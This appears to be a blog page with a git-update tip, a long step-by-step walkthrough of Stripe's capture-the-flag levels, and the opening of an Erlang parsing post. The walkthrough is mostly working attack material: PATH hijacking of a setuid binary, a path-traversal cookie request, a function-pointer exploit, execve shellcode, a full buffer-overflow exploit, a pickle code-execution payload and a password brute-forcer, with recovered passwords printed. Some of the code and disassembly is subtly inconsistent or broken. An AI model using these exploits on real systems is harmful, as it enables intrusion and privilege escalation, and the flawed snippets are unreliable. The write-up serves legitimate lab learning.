Quick tip for updating git repos

If you're like me and keep all your git repositories in a single directory, then I'd wager you're also like me and don't update them as often as you should. Now, I'm not particularly an advocate of willy-nilly updating all of your git repos just because you can, but sometimes it makes sense (like if you're about to hop on an airplane and need to update a few repos before you take off). Well, I had a little bash fun and came up with this little line.

find . -maxdepth 1 -type d \
    -exec bash -c "cd '{}' && if [ -d \"\$PWD/.git\" ]; then \
    echo 'updating' \$PWD; git pull origin master 2>/dev/null; fi" \;

Basically this loops over every directory directly under the current one. If a directory contains a .git directory, it pulls the latest and greatest version (presumably from GitHub). That's it. Hope this helps someone else.
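For kicks, here's the same idea as a little Python sketch (git_repos and update_all are my own helper names, nothing standard):

```python
import os
import subprocess

def git_repos(root="."):
    """Yield each directory directly under root that contains a .git dir."""
    for entry in os.scandir(root):
        if entry.is_dir() and os.path.isdir(os.path.join(entry.path, ".git")):
            yield entry.path

def update_all(root="."):
    for repo in git_repos(root):
        print("updating", repo)
        subprocess.run(["git", "-C", repo, "pull", "origin", "master"])
```

Calling update_all() from the parent directory does the same thing as the find one-liner.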

Hacking for fun -- capture the flag

Stripe recently released their capture-the-flag game (https://stripe.com/blog/capture-the-flag), and I thought it'd be a fun exercise to document my entire procedure.

So... before you enter, I warn you... there are spoilers in here...


Welcome to Capture the Flag. I, by the way, am not at all affiliated with Stripe; I'm just an excited participant and want to share my journey.

Let's get started on level01

ssh level01@ctf.stri.pe

So we want to read the file /home/level02/.password. It looks like it's owned by level02, so we can't just read it (and what fun would that be?).

Let's investigate the binaries that Stripe suggests we look at.

$ /levels/level01
Current time: Fri Feb 24 10:40:58 UTC 2012
$ ls -la /levels/level01 
-r-Sr-x--- 1 level02 level01 8617 2012-02-23 22:44 /levels/level01

Interesting... what can we do with the current date? I suspect it doesn't implement date on its own; that'd be insane. I bet we can exploit that.

Looking at the source... AHA!


It shells out to the system date command. If we could only change what runs when date gets called, perhaps we can use that to our advantage.

In Linux, binaries are found using the $PATH variable. Since the program shells out to date, if we can trick that lookup into resolving something different, BAM, we'd have it. Let's create a "binary" that will show us the password... something like:

$ echo "cat /home/level02/.password" > date
$ chmod +x date

Let's prepend our directory to the path and we're almost there!

$ export PATH=$(pwd):$PATH
$ echo $PATH

Now the shell-out will find our date first, and we're golden.

$ /levels/level01
Current time: kxlVXUvzv


Rad! We've made it to level 02! Perhaps we can have some success in this game after all. Let's move on to level02.

The hint suggests that we should visit http://ctf.stri.pe/level02.php. Note: it confused me at first that the page requires HTTP authentication (until I reread the hint); the credentials are level02 and the password from above.

So once we enter that, we see a form. I wonder if there is any way we can bypass the form. Considering Stripe wants us to 'crack' our way through this, I'm willing to bet some 'idiot' (aka purposeful mistake) left something in the source for level02.php. Let's have a look!

$out = '';
if (!isset($_COOKIE['user_details'])) {
  $out = "Looks like a first time user. Hello, there!";

  $filename = random_string(16) . ".txt";
  $f = fopen('/tmp/level02/' . $filename, 'w');

  $str = $_SERVER['REMOTE_ADDR']." using ".$_SERVER['HTTP_USER_AGENT'];
  fwrite($f, $str);
  setcookie('user_details', $filename);
} else {
  $out = file_get_contents('/tmp/level02/'.$_COOKIE['user_details']);
}
echo $out ?>

Oh wow, that's easy as pie. Do you see why?

The application runs with level03's credentials, so if we can get it to read the file /home/level03/.password, we'll be golden. Luckily we can do this from the browser without much sweat.

We want to get into the else statement so that it 'reads' from a file on the system. If there is a user_details cookie set, we drop into that else branch. We could easily set the cookie from the browser, but we'll use curl since it's easier to show in text.

Making sure to keep the HTTP authentication in the request:

curl --user level02:kxlVXUvzv --digest http://ctf.stri.pe/level02.php

Let's try setting the user_details cookie and see if we can get the file contents to render in the HTML. We saw that it reads from a path on the filesystem, so we can definitely use this to our advantage and have it read the file we want. Let's set the cookie to the path of the file we're interested in, relative to the /tmp/level02 directory: ../../home/level03/.password.

  curl --user level02:kxlVXUvzv --digest --cookie "user_details=../../home/level03/.password" http://ctf.stri.pe/level02.php
  # ...

  # Welcome to the challenge!


Well that was easy!


Congratulations on making it to level 3!

The password for the next level is in /home/level04/.password. As before, you may find /levels/level03 and /levels/level03.c useful. While the supplied binary mostly just does mundane tasks, we trust you'll find a way of making it do something much more interesting.

There are 6 levels in this CTF; if you're stuck, feel free to email ctf@stripe.com for guidance.

Firstly, let's look at the source of /levels/level03.c.

Interesting. At first glance, the source doesn't reveal anything fancy for me yet. The common hacks are out... buffer overflow is taken into account, the format string bug isn't going to be useful here. Looks like we might have to dig a little deeper for this round.

The source reveals that some lazy programmer left a crucial function in the code:

int run(const char *str)
{
  // This function is now deprecated.
  return system(str);
}
This is going to be our target. Since the binary is setuid and owned by level04, anything that function runs will run as the level04 user.

It also shows that it calls a function by pointer after it does the maintenance of copying the buffer and checking for overflows.

fn_ptr fns[NUM_FNS] = {&to_upper, &to_lower, &capitalize, &length};

That's mighty interesting... Finally, the last thing we'll note is that the function gets called through a pointer, which is good. It means that if we can work out where run sits relative to the fns function-pointer array, we can get it executed.

int truncate_and_call(fn_ptr *fns, int index, char *user_string)
{
  char buf[64];
  // Truncate supplied string
  strncpy(buf, user_string, sizeof(buf) - 1);
  buf[sizeof(buf) - 1] = '\0';
  return fns[index](buf);
}
Let's get to work.

ssh level03@ctf.stri.pe
# Fire up gdb on the sucker
gdb /levels/level03 --directory=/levels

(gdb) r 0 "hello world"
Starting program: /levels/level03 0 "hello world"
warning: the debug information found in "/lib/ld-2.11.1.so" does not match "/lib/ld-linux.so.2" (CRC mismatch).

Uppercased string: HELLO WORLD

Program exited normally.

Rad! We're in good shape. Let's take a step back and think about what the stack looks like where we are at:

----------------- <- Top of the stack
|       .       |
|       .       |
|       .       |
|     argv      |
|     argc      |
|     etc       |
|     stack     |
|       |       |
|       |       |
|       v       |
|       ^       |
|       |       |
|       |       |
|     heap      |
|     bss       |
|     etc       |

When the program loads, it starts at the top of the stack and places all of the argv/argc/env values there so the program can reach them while it runs. When a new function is called, its arguments and locals are placed on the stack much as they are for main (with some slight differences, of course). It'll look something like:

|     ...       |
|     argc      |
|     etc       |
|     stack     |
|       |       |
|      ret      |  <- return address after we're done with the function
-----------------  <- frame pointer (basically the top of the stack for the local function)
|      str      |  <- parameter for `int run(const char *str)`
|     vars      |  <- local variables, if any
|       .       |  <- function call

So when we step into the truncate_and_call function, all it does is set up a new frame below our current stack. We're going to do some math and try to calculate where the run function is relative to our current running spot.

Nothing remarkable yet. Let's investigate a bit further into when the function gets called.

(gdb) b truncate_and_call
Breakpoint 1 at 0x8048780: file level03.c, line 57.
(gdb) r 2 "hello world"
Starting program: /levels/level03 2 "hello world"
warning: the debug information found in "/lib/ld-2.11.1.so" does not match "/lib/ld-linux.so.2" (CRC mismatch).

Breakpoint 1, truncate_and_call (fns=0xffcd393c, index=2, user_string=0xffcd5915 "hello world") at level03.c:57
57    {

This is good news, we're almost to the point where we know where the buffer is. If we can load the buffer with the execution method, then we're good to go. Let's go a bit further and then do some digging and whip out our calculators.

(gdb) n
60    strncpy(buf, user_string, sizeof(buf) - 1);
(gdb) p &buf
$1 = (char (*)[64]) 0xffcd38cc

Now that we have the address of the buffer, let's get the address of fns:

(gdb) p fns
$2 = (fn_ptr *) 0xffcd393c

Add a little bit of math:

(gdb) p (0xffcd393c-0xffcd38cc)/sizeof(int)
$5 = 28
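That arithmetic is worth a quick sanity check; note the sign, since buf sits below fns the index we'll eventually feed the program is negative:

```python
fns = 0xffcd393c   # address of the fns array (from gdb)
buf = 0xffcd38cc   # address of buf (from gdb)

index = (buf - fns) // 4   # 4-byte function pointers on this 32-bit binary
print(index)               # -28: buf starts 28 entries below fns
```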

Lastly, let's capture the address of run so we know what to plant for the program to call, and then quit (q):

(gdb) p run
$1 = {int (const char *)} 0x804875b 
(gdb) q

Great, so the start of buf sits exactly 28 pointer-widths below the fns array when the program calls fns[index](buf). Now we can go back to our command line and make the program index backwards up the stack: pass -28 as the index, and it will call whatever address we place in the first four bytes of our string. We'll put the address of run there; and since run then receives buf itself as its argument, system() will try to execute our string as a command, so we also create an executable file whose name is exactly those four bytes.

# Because x86 is little-endian, the address bytes appear "backwards"
$ echo "cat /home/level04/.password" > $(printf "\x5b\x87\x04\x08")
$ chmod +x "$(printf '\x5b\x87\x04\x08')"
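If the byte order looks confusing, Python's struct module shows exactly why the filename comes out that way:

```python
import struct

run_addr = 0x804875b  # address of run(), from gdb

# x86 stores the least significant byte first, so the four bytes of the
# address appear "reversed" when written out in memory order.
print(struct.pack("<I", run_addr))  # b'[\x87\x04\x08' (0x5b is ASCII '[')
```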

Finally run it and we'll get the password!

$ /levels/level03 -28 "$(printf '\x5b\x87\x04\x08')"


Woot! Congrats, we got to level04 in one piece! As per usual, we have to get into the file /home/level05/.password.

Let's take a peek at the source code before we dive too much further into the process. (Because it's so small, I'll just copy the file here).

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void fun(char *str)
{
  char buf[1024];
  strcpy(buf, str);
}

int main(int argc, char **argv)
{
  if (argc != 2) {
    printf("Usage: ./level04 STRING");
    exit(-1);
  }
  fun(argv[1]);
  printf("Oh no! That didn't work!\n");
  return 0;
}
Oh, this looks ripe for the picking. I'd be willing to bet we can do this without batting too much of an eye. It looks like standard buffer overflow exploit fun.

I'll explain. We can exploit this program because the first argument is a string that's being shoved into a buffer whose length is not checked. That means we can write past the end of the buffer, up to where the return pointer is kept. This is the basis for the name of the exploit "buffer overflow." Get it?

top of the stack
[program stuff][--------buffer-------][return_address]

We want to fill that buffer and then overwrite return_address, so that when the function returns, execution jumps wherever we chose.

To be complete, let's talk about writing shellcode. Yet another shellcode tutorial... shhhh, it'll be fun.

When I write shellcode, I could do it directly in assembly, but it takes a while for me to get back into assembly-mode-of-thinking, so I usually like to write what I want in C, disassemble the code, and then strip out the parts I don't need. Plus I usually don't make dumb errors when I do it like that.

Let's whip out our trusty vim and get to coding a C program that drops us into a shell.

#include <stdlib.h>
#include <unistd.h>

int main()
{
  char *args[2];
  args[0] = "/bin/sh";
  args[1] = NULL;
  execve(args[0], args, NULL);
  return 0;
}
This is the absolute smallest, simplest way to drop into a shell (that I can think of right now) in C. So let's compile it and make sure it works (of course).

$ # I use -static almost always so that there are no dynamic linking issues
$ gcc -static -g -o shell shell.c
$ ./shell

Awesome! It works. Now the fun begins in trying to turn this into shellcode. First, we'll turn it into assembly code, because... well, it'll be much easier to shrink and package shellcode from assembly.

$ gdb shell
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:

Reading symbols from /tmp/tmp.RL54A9ZGit/shell...(no debugging symbols found)...done.

(gdb) disas main
Dump of assembler code for function main:
   0x0000000000400434 :    push   %rbp
   0x0000000000400435 :    mov    %rsp,%rbp
   0x0000000000400438 :    sub    $0x10,%rsp
   0x000000000040043c :    movq   $0x4798c4,-0x10(%rbp)
   0x0000000000400444 :    movq   $0x0,-0x8(%rbp)
   0x000000000040044c :    mov    -0x10(%rbp),%rax
   0x0000000000400450 :    lea    -0x10(%rbp),%rcx
   0x0000000000400454 :    mov    $0x0,%edx
   0x0000000000400459 :    mov    %rcx,%rsi
   0x000000000040045c :    mov    %rax,%rdi
   0x000000000040045f :    callq  0x40d4a0
   0x0000000000400464 :    mov    $0x0,%edi
   0x0000000000400469 :    callq  0x401050
End of assembler dump.

Okay, a bit of explaining before we go further. (If you don't want to run through this "tutorial," feel free to skip to the next section.) Remember the last mission, when we had to look up the stack and compute where our function was, taking into account the arguments on the stack for the function call? We're going to do some related work here, so if you skipped that, I suggest checking it out again.

The main method calls execve, which you can see from the line:

0x000000000040045f :  callq  0x40d4a0

Let's follow how the program sets up this call, starting with the stack frame:

        |       .       | <-- stack before the call
%rsp -> |    old %rbp   | <-- push %rbp (the old value of %rbp saved on the stack)

The first step is to save the old %rbp and then point %rbp at the new top of the stack, so the function has its own frame (note: this is how function calls work). Next, sub $0x10,%rsp carves out 16 bytes (two 8-byte slots) of local space on our stack. It now looks like:

        |       .       | 
        |    old %rbp   | 
        |       .       |
        |       .       |
%rsp -> ----------------- <-- sub    $0x10,%rsp

Now we're going to load a specific address inside the memory location we just allocated on the stack.

      |       .       | 
      |    old %rbp   | 
      |       .       |
      |    0x4798c4   | <-- movq   $0x4798c4,-0x10(%rbp) [P("/bin/sh") -- a pointer to "/bin/sh"]
%rsp -> -----------------

That's the address of the "/bin/sh" that we allocated before. To prove it, we can dive into the address in gdb. Let's take a look!

(gdb) x/1s 0x4798c4
0x4798c4:    "/bin/sh"

Cool! The next instruction is going to load 0 into the next memory location just above where "/bin/sh" is located.

        |       .       | 
        |    old %rbp   | 
        |      0x0      | 
        |    0x4798c4   | <-- P("/bin/sh")
%rsp -> -----------------

The next two instructions load P("/bin/sh") into %rax (the mov) and the address of that stack slot, which is the start of our little argv array, into %rcx (the lea), so our updated stack looks like this:

        |       .       | 
        |    old %rbp   | 
        |      0x0      | 
        |    0x4798c4   | <-- P("/bin/sh") -- (mov    -0x10(%rbp),%rax) -- (lea    -0x10(%rbp),%rcx) <~ %rcx
%rsp -> -----------------

The next instruction, mov $0x0,%edx, doesn't push anything at all; it just zeroes %edx. That's the tell for what's really going on here: on x86-64 (the System V ABI), the first few function arguments are passed in registers, not on the stack. The three movs before the call set up execve's three arguments:

        mov    $0x0,%edx     /* arg 3: envp = NULL */
        mov    %rcx,%rsi     /* arg 2: argv = address of our two-slot array */
        mov    %rax,%rdi     /* arg 1: path = P("/bin/sh") */

Since execve looks like:

int execve(const char *path, char *const argv[], char *const envp[]);

everything lines up. %rdi holds the pointer to "/bin/sh", so that's path. %rsi points at the two stack slots we just filled, P("/bin/sh") followed by 0x0, which is exactly a NULL-terminated array of argument strings, so that's argv. And %rdx is NULL, which is where envp points! Ahhh! This is exactly what our C program did, remember? Gah, it's so easy!

Back to the level

Now that we know what the stack looks like, let's write this in assembly. Fire up vi again and let's code this up. Maybe with a bit more verbosity so that we can read it ourselves.

.globl _start

_start:
  xorl %eax, %eax     /* We need to push a null-terminated string to the stack */
  pushl %eax          /* So first, push a null */
  pushl $0x68732f2f   /* Push //sh */
  pushl $0x6e69622f   /* Push /bin */
  movl  %esp, %ebx    /* Store the address (%esp) of /bin/sh in %ebx */
  pushl %eax          /* Since %eax is still null, let's use it again */
  pushl %ebx          /* Now we can write the /bin/sh pointer again for **argv */
  movl  %esp, %ecx    /* Write argv into %ecx */
  xorl  %edx, %edx    /* NULL out %edx */
  movb  $0xb, %al     /* Write syscall 11 (execve) into %al */
  int $0x80           /* Interrupt the system */

Gross, right? Just kidding, hopefully the comments help. Anyway, let's compile this and then load it and see if it works for us!

$ as -o exec.o exec.s 
$ ld -o Exec exec.o 
$ ./Exec 

Awesome! If you didn't make any typos, we should be dropped into a new shell. This is rad. Now we'll extract this assembly language into shellcode. Relax, this part is the easy part.

$ objdump -d Exec 

Exec:     file format elf64-x86-64

Disassembly of section .text:

  4000b0:   c7 04 25 e4 00 60 00    movl   $0x6000d8,0x6000e4
  4000b7:   d8 00 60 00 
  4000bb:   b8 0b 00 00 00          mov    $0xb,%eax
  4000c0:   bb d8 00 60 00          mov    $0x6000d8,%ebx
  4000c5:   ba e0 00 60 00          mov    $0x6000e0,%edx
  4000ca:   cd 80                   int    $0x80
  4000cc:   bb 0a 00 00 00          mov    $0xa,%ebx
  4000d1:   b8 01 00 00 00          mov    $0x1,%eax
  4000d6:   cd 80                   int    $0x80

So this is all great and good, of course... but we'd end up with nulls in our shellcode if we followed along strictly like this (look at all those 00 bytes in the disassembly above). So with a bit of magic and experience with assembly, I'm going to tighten the code, but explain it along the way too. Promise.

.globl _start

_start:
  xorl %eax, %eax     /* We need to push a null-terminated string to the stack */
  pushl %eax          /* So first, push a null */
  pushl $0x68732f2f   /* Push //sh */
  pushl $0x6e69622f   /* Push /bin */
  movl  %esp, %ebx    /* Store the address (%esp) of /bin/sh in %ebx */
  pushl %eax          /* Since %eax is still null, let's use it again */
  pushl %ebx          /* Now we can write the /bin/sh pointer again for **argv */
  movl  %esp, %ecx    /* Write argv into %ecx */
  xorl  %edx, %edx    /* NULL out %edx */
  movb  $0xb, %al     /* Write syscall 11 (execve) into %al */
  int $0x80           /* Interrupt the system */

That looks a lot cleaner, ey? The two big hex constants just spell "/bin//sh", and everything else is pretty self-explanatory. We push the string onto the stack, use the stack pointer to build the NULL-terminated argv array in place, and then invoke syscall 11 (execve on 32-bit Linux).
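You can check what those two constants spell (they're pushed in reverse order, since the stack grows downward):

```python
import struct

# 0x6e69622f is pushed last, so it sits at the lower address and reads first
s = struct.pack("<I", 0x6e69622f) + struct.pack("<I", 0x68732f2f)
print(s.decode())  # /bin//sh
```

The doubled slash is harmless to execve; it just keeps each half exactly four bytes.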

Notice how the nulls are avoided. Instead of keeping "/bin/sh" in a data section (whose absolute 32-bit address would encode with 00 bytes), we build the string on the stack with push instructions, and instead of a full-width mov of the syscall number into %eax (which would pad the immediate with 00 bytes) we xor %eax clean and write only the low byte with movb. This keeps every opcode byte non-null.

Cake! Now let's turn that into shellcode.

$ objdump -d ./code

./code:     file format elf32-i386

Disassembly of section .text:

 8048054:   31 c0                   xor    %eax,%eax
 8048056:   50                      push   %eax
 8048057:   68 2f 2f 73 68          push   $0x68732f2f
 804805c:   68 2f 62 69 6e          push   $0x6e69622f
 8048061:   89 e3                   mov    %esp,%ebx
 8048063:   50                      push   %eax
 8048064:   53                      push   %ebx
 8048065:   89 e1                   mov    %esp,%ecx
 8048067:   31 d2                   xor    %edx,%edx
 8048069:   b0 0b                   mov    $0xb,%al
 804806b:   cd 80                   int    $0x80

Thanks to our trickery, we have no nulls in our shellcode. Now we can take those hex values and string them together as shellcode. You can do this by hand or use a nifty little tool such as:

#include <stdio.h>

/* code_start/code_end are labels wrapped around the shellcode in the
   linked-in assembly; since the code contains no null bytes, printing
   from code_start dumps the raw bytes as a string. */
extern char code_start, code_end;

int main() { fprintf(stderr, "%s", &code_start); return 0; }

Either way, we end up with:

char code[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

Now let's test it with our own C program before we go on the attack:

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>

int (*sc)();

char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

int main(int argc, char **argv) {
    void *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
    if (ptr == MAP_FAILED) {
        perror("mmap");
        exit(1);
    }
    memcpy(ptr, shellcode, sizeof(shellcode));
    sc = ptr;
    sc();          /* jump into the shellcode */
    return 0;
}
Note: we're operating on a non-executable stack, so we have to use mmap to create an executable memory mapping (see man mmap) and copy the shellcode into place. Let's see if it works...

$ gcc -g test.c -o test
$ ./test 

Perfect! Our shellcode is 25 bytes long; with 1024 bytes of buffer available in the program, it's tiny in the scheme of things.
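Both properties we care about, the length and the absence of null bytes (strcpy stops at the first null), are quick to verify:

```python
shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80")

print(len(shellcode))   # 25
print(0 in shellcode)   # False: no nulls to trip up strcpy
```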

One more bit of stack review before we actually get to the hack (this will help us shortly, I promise). The stack when a function is called looks something like this:

| return address | rbp+4
|   saved rbp    | rbp   <- rsp right after the prologue
|       .        | rbp-4
|       .        | rbp-8
|       .        | rbp-12
|       .        | rbp-16

Let's see why this is useful. Let's try to blow the stack on the program first.

$ gdb /levels/level04
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:

Reading symbols from /levels/level04...(no debugging symbols found)...done.
(gdb) r `perl -e 'print "ABCD" x 1100'`
Starting program: /levels/level04 `perl -e 'print "ABCD" x 1100'`
warning: the debug information found in "/lib/ld-2.11.1.so" does not match "/lib/ld-linux.so.2" (CRC mismatch).

Program received signal SIGSEGV, Segmentation fault.
0x44434241 in ?? ()

Looking at the registers, we see that the base pointer and the instruction pointer have been overwritten and now point to "DCBA."

(gdb) i r
eax            0xffe21200   -1961472
ecx            0x0  0
edx            0x1131   4401
ebx            0xf77abff4   -142950412
esp            0xffe21610   0xffe21610
ebp            0x44434241   0x44434241
esi            0x0  0
edi            0x0  0
eip            0x44434241   0x44434241

That's the basis of the buffer overflow exploit. We're going to load the saved return address (which becomes eip) with an address we want... or at least something close to one that we know to be good.

Let's go back to /levels/level04.

So what we'll do is flow in the shellcode, then a bunch of no-ops (bytes that do nothing), and then overrun the return address with one that leads back into our code.

Awesome. We want to get the shellcode into the buffer and set the return address 8 bytes later so that when the return address is popped off, it looks like it's ours :)

We could write the final part of this exploit in another language, like Python or Ruby, but to stay consistent we'll construct this part in C.

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define LENGTH                  1024+16
#define PROG_NAME               "/levels/level04"
#define RET                     0x0804857b
#define NOP                     0x90

// eip sits at offset 1036 in the buffer, so the 4-byte return
// address occupies the last bytes and everything before it is
// shellcode followed by NOP filler
const char *sc =  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

int main (int argc, char const *argv[])
{
  /* declare and initialize some of the variables */
  char buff[LENGTH + 1];
  long retaddr = RET;
  int i,
      len = LENGTH,
      sc_len = strlen(sc);

  // [shellcode][NOPNOPNOPNOPNOPNOP][return]
  memcpy(buff, sc, sc_len);
  for (i = sc_len; i < len - (int)sizeof(retaddr); i++)
    buff[i] = NOP;
  memcpy(buff + len - sizeof(retaddr), &retaddr, sizeof(retaddr));
  buff[len] = '\0';

  execl(PROG_NAME, PROG_NAME, buff, (char *)NULL);
  return 0;
}

So how did I get the EAX location? Well... because the program uses strcpy, and strcpy returns its destination, %eax will contain the location of the buffer that gets overflowed! Duh, so all we have to do is find a call *%eax instruction in the binary and bam-o! Let's look for that:

  $ objdump -d /levels/level04 | grep eax | grep call
   8048438:   ff 14 85 14 9f 04 08    call   *0x8049f14(,%eax,4)
   804847f:   ff d0                   call   *%eax
   804857b:   ff d0                   call   *%eax

Sweet! So run that bad boy and we'll get ourselves a password!

  $ ./b
  $ cat /home/level05/.password


Oh, this one seems quite a bit different. The opening message:

Congratulations on making it to level 5! You're almost done!

The password for the next (and final) level is in /home/level06/.password.

As it turns out, level06 is running a public uppercasing service. You can POST data to it, and it'll uppercase the data for you:

  curl localhost:9020 -d 'hello friend'
  {
        "processing_time": 5.0067901611328125e-06,
        "queue_time": 0.41274619102478027,
        "result": "HELLO FRIEND"
  }

You can view the source for this service in /levels/level05. As you can see, the service is structured as a queue server and a queue worker.

Could it be that this seemingly innocuous service will be level06's downfall?

Let's look in the source code to see if we can find any hints.

If you know Python, you know the pickle module is cause for concern, and the application is clearly using it (see http://blog.nelhage.com/2011/03/exploiting-pickle/ and http://penturalabs.wordpress.com/2011/03/17/python-cpickle-allows-for-arbitrary-code-execution/). Since it calls pickle, that's where we'll start looking.

  def deserialize(serialized):
      logger.debug('Deserializing: %r' % serialized)
      parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
      match = parser.match(serialized)
      direction = match.group(1)
      data = match.group(2)
      job = pickle.loads(match.group(3))
      return direction, data, job

Hm... so the line calling pickle is job = pickle.loads(match.group(3)). Alrighty... that'll be useful in a minute... First, look at the string it parses: the third match group is whatever comes after job:. Clearly the goal is to control that third group, and that should be relatively easy, because all we have to do is supply something that matches up through the job: marker. Rad. Let's experiment around:

  $ curl localhost:9020 -d 'testdata'
  {
      "processing_time": 5.0067901611328125e-06, 
      "queue_time": 0.41687297821044922, 
      "result": "TESTDATA"
  }
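To see how much of the body ends up in that third group, here's the (repaired) pattern from the source against a made-up request body; the sample string is mine:

```python
import re

# Pattern from the service's deserialize() (quoting repaired)
parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)

m = parser.match("type: uppercase; data: testdata; job: ANYTHING WE WANT")
print(m.group(3))  # ANYTHING WE WANT
```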

Okay, let's see if we can't trick it into including our data in job. The data we'll want to inject, by the way, is something along the lines of:

  "cos\nsystem\n(S'cat /home/level06/.password > $(pwd)'\ntR."

We know this because this is what the pickle exploit looks like (see http://penturalabs.wordpress.com/2011/03/17/python-cpickle-allows-for-arbitrary-code-execution/ for more information).
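To convince yourself the string really executes a command when unpickled, try the same opcode layout with a harmless command in place of the cat (the shell no-op true):

```python
import pickle

# 'c' pushes os.system, '(' marks the stack, S'...' is the argument
# string, 't' builds the tuple, 'R' applies the callable, '.' stops.
payload = b"cos\nsystem\n(S'true'\ntR."

result = pickle.loads(payload)  # actually runs os.system('true')
print(result)  # 0, the exit status of `true`
```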

Let's see if we can't try to get our stuff in the job field. Then we can clearly run that exploit. Let's try and look at some logs at the same time...

  $ curl localhost:9020 -d 'datamatcheshere; job: hi'
  {
      "result": "Job timed out"
  }

Let's see, just for kicks, if we can get it to run something. Putting in the exploit just to see if we can't get it to run...

  $ curl localhost:9020 -d "datamatcheshere; job: $(printf "cos\nsystem\n(S'cat /home/level06/.password > /tmp/pword05'\ntR.")"
  {
      "result": "Job timed out"
  }

Bummer, that doesn't look like it did anything... for giggles, let's see if it did.

  $ cat /tmp/pword05

Hah! That's cool. Let's move onwards!


Sweet! Logging in, we see the usual message:

  Congratulations on making it to level 6! This is the final level. The
  flag is almost in your grasp.

  The password for the flag is in /home/the-flag/.password.

  As it turns out, the-flag is a pretty arrogant user. He created a
  taunting utility and left it in /levels/level06 (source code in
  /levels/level06.c). This utility will read the first line of a
  specified file, compare it with your supplied guess, and taunt you
  unless you guessed correctly.

  You could try using the taunt utility to brute-force the password, but
  that would take... well, I don't want to say forever, but
  approximately that. I guess you'll have to find another way.

  Best of luck!

Oh fun! Let's dig in. Let's create a dummy file to play with and check the output of /levels/level06:

  $ /levels/level06 /home/the-flag/.password 1
  Welcome to the password checker!
  level06@ctf5:/tmp/tmp.RWhNkGzD30$ Ha ha, your password is incorrect!

Hm... that's not incredibly helpful... yet. Let's look at the source. I see fork in there... perhaps we can play with fork... Let's keep looking... Hm. Not much else to go on... I suppose we could try to 'brute-force' the password, despite the fact that the hint says not to. Since we are looking at it character 1-by-1, perhaps we can work on getting each character... Let's try it.

I wrote this program and hopefully included a bunch of comments to help, but basically we're iterating over every single character and using a unix pipe to pass it off to the program. Then we'll wait for the response to come back and hopefully it'll be a good one. Speaking of which, I had to check what a good response would be... let's see:

  $ /levels/level06 /home/the-flag/.password 1
  Welcome to the password checker!
  level06@ctf5:/tmp/tmp.tVkFJvBIju$ Ha ha, your password is incorrect!
  echo $?

Okay, so maybe we can't rely on the exit status of the response... how about rlimit? rlimit is the resource-limit mechanism Linux provides. We'll set a hard limit on the file stdout writes to, so that if an extra character gets written we can catch it. Oh, that's pretty nifty, ey? Anyway, here's my source code, mainly because I'm tired. If anyone wants me to, I'll comment more about it.

  vi level06.c; gcc -o level06 level06.c; ./level06

    Oh yeah, pipes: http://tldp.org/LDP/lpg/node11.html

  #include <stdio.h>
  #include <stdlib.h>
  #include <unistd.h>
  #include <errno.h>
  #include <fcntl.h>
  #include <limits.h>
  #include <string.h>
  #include <sys/wait.h>
  #include <sys/time.h>
  #include <sys/resource.h>
  #include <sys/types.h>
  #include <sys/stat.h>

  #define PROG_NAME "/levels/level06"
  #define THE_FLAG "/home/the-flag/.password"
  #define BUFSIZE 512

  // Globals, woo
  int base_filesize;
  char buf[BUFSIZE];

  int main(int argc, char *argv[]) {
    char buffer[BUFSIZE];
    int i, c, status;
    struct rlimit rl;
    pid_t pid;
    memset(buffer, 0, BUFSIZE);
    /* assumption: the checker prints this banner before anything else */
    base_filesize = strlen("Welcome to the password checker!\n");
    for (i = 0; i < BUFSIZE - 1; i++) {   /* one password position at a time */
      for (c = ' '; c <= '~'; c++) {      /* every printable candidate */
        buffer[i] = (char)c;
        if ((pid = fork()) == 0) {
          /* cap stdout: a guess that matches one character further makes
           * the checker emit one more byte, tripping the limit (SIGXFSZ) */
          rl.rlim_cur = rl.rlim_max = base_filesize + i;
          setrlimit(RLIMIT_FSIZE, &rl);
          freopen("/tmp/out", "w", stdout);
          execl(PROG_NAME, PROG_NAME, THE_FLAG, buffer, (char *)NULL);
          exit(1);
        }
        waitpid(pid, &status, 0);
        if (WIFSIGNALED(status) && WTERMSIG(status) == SIGXFSZ)
          break;                          /* this character got further */
      }
    }
    printf("Password: %s\n", buffer);
    return 0;
  }

  Anyway, happy hacking friends. Remember, do only good :)!

  Password: theflagl0eFTtT5oi0nOTxO5

Other solutions online:




Special thanks to zx2c4 for ideas and thoughts.

Neotoma - Super powerful parsing for erlang

Erlang strings are painful

Oh it's so true. The pain is super apparent, especially when trying to parse configuration files. The traditional way to parse a configuration file that is not in the erlang format can be pretty hard to do. For instance, for beehive, the application configuration template looks like:


# Config file
# For example, a rack app
bundle: echo "Bundle java stuff"
start: /bin/rackstart.sh
# etc. etc.

Originally, this was parsed in lex/yacc and consumed in c++ (shudder). The code for that is available buried deep within the history of babysitter

A traditional parser would look something like this:

-module (config_parser).
-export ([file/1]).

